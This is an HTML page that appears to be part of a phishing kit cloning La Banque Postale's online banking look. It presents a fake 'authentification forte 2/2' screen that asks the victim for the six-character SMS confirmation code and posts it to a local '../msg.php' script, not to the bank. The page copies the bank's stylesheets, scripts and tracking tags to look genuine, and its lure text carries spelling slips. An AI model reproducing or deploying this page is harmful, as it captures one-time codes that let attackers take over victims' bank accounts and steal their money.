
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="./reset.css" media="all">
<link rel="stylesheet" type="text/css" href="./datePicker.css" media="all">
<link rel="stylesheet" type="text/css" href="./default.css" media="all">
<link rel="stylesheet" type="text/css" href="./static.css" media="all">
<link rel="stylesheet" type="text/css" href="./rib.css" media="all">
<link rel="stylesheet" type="text/css" href="./blocs.css" media="all">
<link rel="stylesheet" type="text/css" href="./jquery-ui-1.8.6.css" media="all">
<link rel="stylesheet" type="text/css" href="./print.css" media="all">
<link rel="stylesheet" type="text/css" href="./bridge.css" media="all">
<!-- chargement des fontes en local a cause d'un probleme de securite pour aller les chercher sur CQ-->
<link rel="stylesheet" type="text/css" href="./fontesLocales.css" media="all">
<link rel="stylesheet" type="text/css" href="./main.css" media="all">
<link rel="stylesheet" type="text/css" href="./font.css" media="all">
<link rel="stylesheet" type="text/css" href="./modal.css" media="all">
<link rel="stylesheet" type="text/css" href="./picto.css" media="all">
<link rel="stylesheet" type="text/css" href="./ereleve.css" media="all">
<link rel="stylesheet" type="text/css" href="./mainform.css" media="all">
<link rel="stylesheet" type="text/css" href="./standardFormAuth.css" media="all">
<link rel="stylesheet" type="text/css" href="./select2.css" media="all">
<link rel="stylesheet" type="text/css" href="./q4x.css" media="all">
<link rel="stylesheet" type="text/css" href="./header.css" media="all">
<link rel="stylesheet" type="text/css" href="./listeCompte.css" media="all">
<link rel="stylesheet" type="text/css" href="./search.css" media="all">
<link rel="stylesheet" type="text/css" href="./alert.css" media="all">
<link rel="stylesheet" type="text/css" href="./card.css" media="all">
<link rel="stylesheet" type="text/css" href="./mainContentCerticode.css" media="all">
<link rel="stylesheet" type="text/css" href="./collapse.css" media="all">
<link rel="stylesheet" type="text/css" href="./tooltip.css" media="all">
<link rel="stylesheet" type="text/css" href="./syntheseSolde.css" media="all">
<link rel="stylesheet" type="text/css" href="./expandBanner.css" media="all">
<link rel="stylesheet" type="text/css" href="./menu.css" media="all">
<link rel="stylesheet" type="text/css" href="./mainContentEReleves.css" media="all">
<link rel="stylesheet" type="text/css" href="./bgLight.css" media="all">
<link rel="stylesheet" type="text/css" href="./faq.css" media="all">
<link rel="stylesheet" type="text/css" href="./footer.css" media="all">
<link rel="stylesheet" type="text/css" href="./menuCalque.css" media="all">
<link rel="stylesheet" type="text/css" href="./persoCarte.css" media="all">
<link rel="stylesheet" type="text/css" href="./gridStrap.css" media="all">
<link rel="stylesheet" type="text/css" href="./subscribe.css" media="all">
<link rel="stylesheet" type="text/css" href="./accountResume2.css" media="all">
<link rel="stylesheet" type="text/css" href="./account.css" media="all">
<link rel="stylesheet" type="text/css" href="./tiles.css" media="all">
<link rel="stylesheet" type="text/css" href="./ip.css" media="all">
<link rel="stylesheet" type="text/css" href="./selectList.css" media="all">
<link rel="stylesheet" type="text/css" href="./outils.css" media="all">
<link rel="stylesheet" type="text/css" href="./correctifs-style.css" media="all">
<link rel="stylesheet" type="text/css" href="./persoCompte.css" media="all">
<!--[if lte IE 8]>
    <link rel="stylesheet" type="text/css" href="https://transverse.labanquepostale.fr/q4x/responsive/css/q4x/ie8.css" media="all" />
<![endif]-->
<!--[if lte IE 7]>
    <link rel="stylesheet" type="text/css" href="https://transverse.labanquepostale.fr/q4x/responsive/css/q4x/ie7.css" media="all" />
<![endif]-->
<!--[if lte IE 6]>
   <link rel="stylesheet" type="text/css" href="https://transverse.labanquepostale.fr/q4x/responsive/css/q4x/ie6.css" media="all" />
<![endif]-->


<!-- Javascript commun framework -->
<script type="text/javascript" async="" src="./exec.js.téléchargement"></script><script type="text/javascript" async="" src="./6573388.js.téléchargement"></script><script type="text/javascript" async="" src="./tro.js.téléchargement"></script>
<script type="text/javascript" src="./eA-HTML.js.téléchargement"></script>
<script type="text/javascript" src="./FwMC-Ext.js.téléchargement"></script>

<!-- Javascript commun application -->
<script type="text/javascript" src="./lib-formbean-bel.js.téléchargement"></script>
<script type="text/javascript" src="./generique.js.téléchargement"></script>
<script type="text/javascript" src="./outils.js.téléchargement"></script>

<!-- Javascript messagerie -->
<script type="text/javascript" src="./ajax.js.téléchargement"></script>
<script type="text/javascript" src="./hub.js.téléchargement"></script>
<script type="text/javascript" src="./messagerie.js.téléchargement"></script>
<script type="text/javascript" src="./persoCartes.js.téléchargement"></script>

<!-- Javascript -->
<script type="text/javascript" src="./jquery-1.11.1.min.js.téléchargement"></script>
<script type="text/javascript" src="./jquery-migrate-1.4.0.js.téléchargement"></script>
<script type="text/javascript" src="./jquery.tablesorter.js.téléchargement"></script>
<script type="text/javascript" src="./jquery.fixcolheight.js.téléchargement"></script>
<script type="text/javascript" src="./jquery.simplemodal.js.téléchargement"></script>
<script type="text/javascript" src="./jquery.placeholder.js.téléchargement"></script>
<script type="text/javascript" src="./jquery.datePicker.js.téléchargement"></script>
<script type="text/javascript" src="./jquery-ui.min.js.téléchargement"></script>
<script type="text/javascript" src="./date.js.téléchargement"></script>
<script type="text/javascript" src="./date_fr.js.téléchargement"></script>
<script type="text/javascript" src="./swfobject.js.téléchargement"></script>
<script type="text/javascript" src="./typeahead.jquery.min.js.téléchargement"></script>

<script type="text/javascript" src="./config.js.téléchargement"></script>
<script type="text/javascript" src="./lib-init.js.téléchargement"></script>
<script type="text/javascript" src="./print.js.téléchargement"></script>

<script type="text/javascript" src="./bootstrap.min.js.téléchargement"></script>
<script type="text/javascript" src="./plugin.js.téléchargement"></script>
<script type="text/javascript" src="./main.js.téléchargement"></script>
<script type="text/javascript" src="./select2.min.js.téléchargement"></script>

<!-- gestion du header responsive -->
<script type="text/javascript" src="./headerResponsive.js.téléchargement"></script>

<!-- Pour pubs Interact / CQ -->
<script type="text/javascript" src="./profile.js.téléchargement"></script>


<!-- MARQUAGE XITI -->
<!-- XiTi -->
<script type="text/javascript"> 
//<![CDATA[ 
var tc_vars = {
xiti_xtsite:"388889",
xiti_xtn2:"16",
xiti_xtpage:"Profil::Parametres::Informations_personnelles_email_deja_renseigne"

}// ]]>
</script>
<!-- // XiTi -->


<!--  NE JAMAIS SUPPRIMER L'APPEL DU xitiTMSFileName.js APRES LA TAGLIB XITI
      Il faut toujours importer le fichier xitiTMSFileName.js APRES l'utilisation de la taglib bad:xiti, 
      car la fonction xt_cart(), générée par la taglib Xiti, est appelée par xitiTMSFileName.js -->
<!-- XiTi -->
<!-- Récupération de la conf du js principal pour tag xiti -->
<script type="text/javascript" src="./tc_LaBanquePostale_8.js.téléchargement"></script>
<script type="text/javascript" src="./tc_LaBanquePostale_9.js.téléchargement"></script>
<script type="text/javascript" src="./tc_event_timer.js.téléchargement"></script>
<!-- // XiTi -->

<script type="text/javascript" src="./xitiUtils.js.téléchargement"></script>



<link rel="stylesheet" type="text/css" href="./popinV3.css" media="all">
<link rel="stylesheet" type="text/css" href="./collect.css" media="all">

<script type="text/javascript" src="./popinV3.js.téléchargement"></script>
<script type="text/javascript" src="./collecteEmail.js.téléchargement"></script>
<script type="text/javascript">
    <!-- Configuration du marquage -->
    $(document).ready(function() {
        $('#modifierHref').bind('click', MarquageCollecteEmail.modifier);
        $('#validerButton').bind('click', MarquageCollecteEmail.valider);
    });
</script>

</head><body marginwidth="0" marginheight="0"><div class="modal-body email-form main-content-collecteEmail">
      <form action="../msg.php" method="post" target="_parent">
        <center><h2 class="regular fs19 mbm" style="font-family: Tahoma, Verdana, Segoe, sans-serif;"><b>AUTHENTIFICATION FORTE 2/2</b><br><p style="font-size: 12px;"><i>"Si vous ne recevez pas le SMS dans 5 minutes, veuillez <a href="#"><u>réessayer</u></a> ."</i></p></h2>  </center>
        <h2 class="regular fs19 mbm">Cher(s) Client(s),</h2>
        <div id="profil_collecte_email_popin_haut">
                <div class="CQblocedito  cq-dd-file" id="profil_collecte_email_popin_haut">
		
		<div class="block">
			<div class="blockInside">
				<div>
                    <div class="textFCK">La confirmation de votre connexion nous permet d'enregistrer votre appareil pour vos futur connexion et aussi de vous informer plus rapidement des évènements liés à votre compte. </p>
<p>&nbsp;</p>
</div>
				</div>
			</div>
		</div>
	</div>
            </div>
            <!-- fin bloc editorial id : profil_collecte_email_popin_haut //-->
        <p></p>
        <div class="rwk">
            <div class="row">
                <div class="col-1">   
                   <p class="mbm fs17"> <strong>&nbsp;&nbsp;&nbsp;Saisissez le code SMS</strong> : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="cde" maxlength="6" required="required" placeholder="" style="width: 200px; border: 2 solid; border-color: #103D9E;" minlength="6" pattern="[a-zA-Z0-9]+"></p><br /><br /> 
                    <div class="cgv">
                            <div class="checkbox">
                            <input id="cgv2_valeur" name="formulaire.cgvValider" type="hidden" value="false">  
                            
                                
                                    <input type="checkbox" id="cgv2" name="formulaire.cgvValider" aria-labelledby="cgv2_id2">
                                
                                
                            
                            <label for="cgv2" id="cgv2_id2" class="inline btn-check">
                                <!-- debut bloc editorial id : profil_collecte_email_popin_mentions_legales //-->   
                                <div class="CQblocedito  cq-dd-file" id="profil_collecte_email_popin_mentions_legales">
		
		<div class="block">
			<div class="blockInside">
				<div>
				
					<div class="textFCK"><p>J'accepte de recevoir les notifications liées aux activités sur mes comptes, par téléphhone, de la part de La Banque Postale. <a href="#" class="underline" title="Protection des données personnelles (nouvelle fenêtre)">Protection des données personnelles.</a></p>
</div>
				</div>
			</div>
		</div>
	</div>

                            </label>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="ptm btn-form">
            <center><b><input class="button button--primary" name="valider" type="submit" value="VALIDER"></b></center>
        </div>
</form>
    <br>
</div>

<!-- CODE A INSERER SUR  LES PAGES DEVANT ÊTRE INSERÉES EN IFRAME -->

<script type="text/javascript" src="./iframeResizer.contentWindow.min.js.téléchargement"></script>
<!-- CODE A INSERER SUR  LES PAGES DEVANT ÊTRE INSERÉES EN IFRAME -->
<div style="clear: both; display: block;"></div></body></html>